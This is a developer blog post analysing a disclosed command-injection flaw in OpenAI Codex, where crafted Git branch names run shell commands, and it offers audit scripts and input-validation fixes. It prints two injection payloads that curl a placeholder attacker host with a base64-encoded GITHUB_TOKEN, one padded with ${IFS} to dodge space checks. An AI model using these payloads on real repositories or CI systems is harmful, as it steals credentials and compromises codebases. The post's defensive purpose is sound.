DEV Community

Toni Antunovic
Toni Antunovic

Posted on • Originally published at lucidshark.com

When a Git Branch Name Becomes a Weapon: The Codex Command Injection That Could Steal Your GitHub Token

This article was originally published on LucidShark Blog.


In February 2026, BeyondTrust Phantom Labs quietly disclosed a command injection vulnerability in OpenAI Codex. The attack vector: a maliciously crafted Git branch name.

No phishing. No social engineering. No malware. A developer working on a shared repository, or any automated CI process that cloned from one, could have their GitHub access token silently exfiltrated to an attacker's server by checking out a specially named branch.

The vulnerability was patched on February 5, 2026. The security community coverage crested only recently. The attack pattern it reveals is not going away.

What OpenAI Codex Does

Codex is OpenAI's AI coding agent, embedded in the ChatGPT web UI and available as a CLI, SDK, and IDE extension. When you create a Codex task, the agent spins up an isolated container, clones your repository, and begins executing tools and writing code. The container setup process passes your task configuration, including the target branch name, through an HTTP request to the Codex backend. The backend uses these values to initialize the environment. This is where the injection occurs.

The Attack

The branch parameter in the Codex task creation request was passed to a shell command without sanitization. If you could control the branch name that Codex processed, you could inject arbitrary shell commands into the environment setup phase.

Here is what a malicious branch name looks like:

main; curl -s https://attacker.example.com/collect?t=$(cat $GITHUB_TOKEN | base64) #
Enter fullscreen mode Exit fullscreen mode

The semicolon terminates the legitimate git checkout command. The curl command executes next, reading the $GITHUB_TOKEN environment variable (which Codex had injected for repository access), base64-encoding it, and sending it to an attacker-controlled server. The hash sign comments out any trailing content.

But there is a complication: a branch name containing a semicolon and spaces would fail basic Git validation. An attacker cannot push a branch with that name to a remote repository.

The solution involves Unicode.

The Unicode Trick

Git enforces constraints on ASCII control characters and certain special characters in branch names, but it does not validate against the entire Unicode character set. Specifically, Unicode Ideographic Space (U+3000) is visually indistinguishable from a regular space in most terminals and editors, passes Git's branch name validation, and is treated as whitespace by many shell parsers.

A branch name that appears completely normal in any editor or terminal could contain a hidden injection payload using Unicode lookalikes and the Internal Field Separator variable ${IFS} to replace spaces:

main; curl${IFS}-s${IFS}https://attacker.example.com/collect?t=$(cat${IFS}$GITHUB_TOKEN|base64)${IFS}#
Enter fullscreen mode Exit fullscreen mode

A developer reviewing pull request branch names, or a CI engineer scanning repository branch lists, would see nothing unusual. The injection payload is visually hidden.

Warning: Visual Inspection Cannot Detect This Attack. Unicode Ideographic Space (U+3000) renders identically to ASCII space in virtually all terminals, code editors, and web interfaces. Branch names containing injection payloads using this technique cannot be distinguished from legitimate branch names by visual review alone. Automated validation is required.

What the Attacker Gets

The GITHUB_TOKEN variable available inside a Codex container is a GitHub User Access Token with the permissions granted to the user who created the task. Depending on the user's access level, this token can provide:

  • Read and write access to all repositories the user has access to
  • Ability to create and approve pull requests
  • Access to organization secrets in some configurations
  • Ability to trigger CI/CD workflows

A stolen GitHub token is not a read-only credential. In most developer environments, it is an effective admin key to the codebase. The blast radius extends further if the compromised user has access to organizational repositories, if the token is used as a service account credential, or if the repository contains additional secrets that the attacker can now read.

Why AI Coding Tools Are Particularly Vulnerable to This Pattern

The command injection class of vulnerability is not new. Unsanitized inputs flowing into shell commands is a well-understood failure mode. What makes this instance significant is where it appears: in an AI coding tool, built by a company that arguably set the standard for responsible AI deployment.

AI coding tools have a specific property that makes injection vulnerabilities more dangerous than in traditional software: they operate at the boundary between user-controlled input and privileged execution environments.

A traditional code editor reads files and displays them. An AI coding agent reads files, understands them, executes tools against them, and makes authenticated API calls on the user's behalf. The gap between "read this file" and "authenticate to your cloud provider and execute commands" is where the expanded attack surface lives.

Every piece of external data that flows into an AI coding agent is potential injection material: repository contents, commit messages, branch names, issue titles, dependency names, code comments, environment variable names. In a traditional tool, these are passive data. In an agentic tool, they are potential commands.

Warning: The Same Pattern Appears Across Tools. The branch-name injection in Codex is specific to one tool, but the underlying pattern (external repository data flowing unsanitized into privileged shell contexts) exists across AI coding tools. Any tool that clones repositories and executes shell commands in the same process, passing user-controlled strings to shell invocations without sanitization, may have similar exposure. The Codex disclosure should prompt audits of comparable tools, not just a single patch.

Detection: What to Look For

If you used Codex between its launch and February 5, 2026, particularly with shared or forked repositories, audit your GitHub token activity.

Check GitHub's token activity log for unexpected API calls, especially outbound calls during CI runs:

# Audit recent GitHub token activity
gh api /repos/{owner}/{repo}/events --paginate | \
  jq '.[] | select(.type == "PushEvent" or .type == "CreateEvent") | {actor: .actor.login, type: .type, created_at: .created_at}'

# Check for unexpected OAuth app authorizations
gh api /user/marketplace_purchases
gh api /applications/grants
Enter fullscreen mode Exit fullscreen mode

Check for branch names in your repository history that contain Unicode characters outside the ASCII range:

# Find branches with non-ASCII characters in their names
git branch -a | python3 -c "
import sys
for line in sys.stdin:
    name = line.strip().lstrip('* ')
    if any(ord(c) > 127 for c in name):
        print(f'SUSPICIOUS: {name!r}')
"
Enter fullscreen mode Exit fullscreen mode

Mitigation

Rotate your GitHub tokens. If you used Codex on shared repositories before February 5, 2026, treat any GitHub access tokens used during that period as potentially compromised. Generate new tokens and revoke the old ones.

Audit repository branch names. Run the script above against any repositories that Codex accessed. Look specifically for branch names containing Unicode Ideographic Space (U+3000) or other non-ASCII characters that serve no legitimate purpose.

Restrict token permissions. GitHub's fine-grained personal access tokens allow per-repository, per-permission scoping. If you use AI coding tools that require repository access, create dedicated tokens with the minimum permissions necessary, scoped to only the repositories the tool needs.

Validate inputs at the tool level. For teams building internal tooling or CI pipelines that pass branch names to shell commands, validate that branch names contain only expected characters before passing them to any shell context:

import re
import subprocess

def validate_branch_name(branch: str) -> bool:
    # Allow only ASCII alphanumerics, hyphens, slashes, underscores, and dots
    # Reject anything with Unicode characters outside this set
    return bool(re.match(r'^[a-zA-Z0-9._\-/]+$', branch))

def safe_checkout(branch: str):
    if not validate_branch_name(branch):
        raise ValueError(f"Branch name contains invalid characters: {branch!r}")
    # Pass as argument list, never as a shell string
    subprocess.run(['git', 'checkout', branch], check=True)
Enter fullscreen mode Exit fullscreen mode

Why Subprocess Args Are Safer Than Shell Strings. The safest mitigation for shell injection is to pass arguments as a list to subprocess rather than as a shell string. When you call subprocess.run(['git', 'checkout', branch]), the branch name is passed directly to the process as an argument, never interpreted by a shell. No amount of semicolons, Unicode tricks, or variable expansions can escape argument list boundaries. Shell strings (subprocess.run(f"git checkout {branch}", shell=True)) pass the entire string through a shell interpreter and are vulnerable to injection by design.

The Broader Lesson for AI Coding Workflows

The Codex vulnerability is fixed. But it is a preview of a vulnerability class that will recur across AI coding tools as long as these tools accept external user-controlled data, execute privileged operations in the same environment, and treat user-controlled input as implicitly trusted.

The traditional security model: distrust external input, sanitize before use, separate data from execution. This applies to AI coding tools the same way it applies to web applications. The tooling ecosystem around AI coding agents is young enough that these principles have not yet been universally applied.

Local-first tools have a structural advantage here: when quality checks and code analysis run as local MCP tools rather than in cloud-provisioned containers, the execution environment is your machine, with your access controls, your network policies, and your visibility. A command injection in a local process produces noise you can see. A command injection in a cloud container exfiltrates data before you know anything happened.


Harden Your AI Coding Pipeline with LucidShark

LucidShark runs SAST, SCA, linting, and dependency analysis locally as MCP tools inside Claude Code. Your code never leaves your machine for quality analysis, and the quality gate layer has no cloud authentication tokens to steal. Install with:

curl -fsSL https://raw.githubusercontent.com/toniantunovic/lucidshark/main/install.sh | bash
Enter fullscreen mode Exit fullscreen mode

Local-first quality gates are not just about privacy. They are about keeping the attack surface of your development workflow contained to infrastructure you control.

Top comments (0)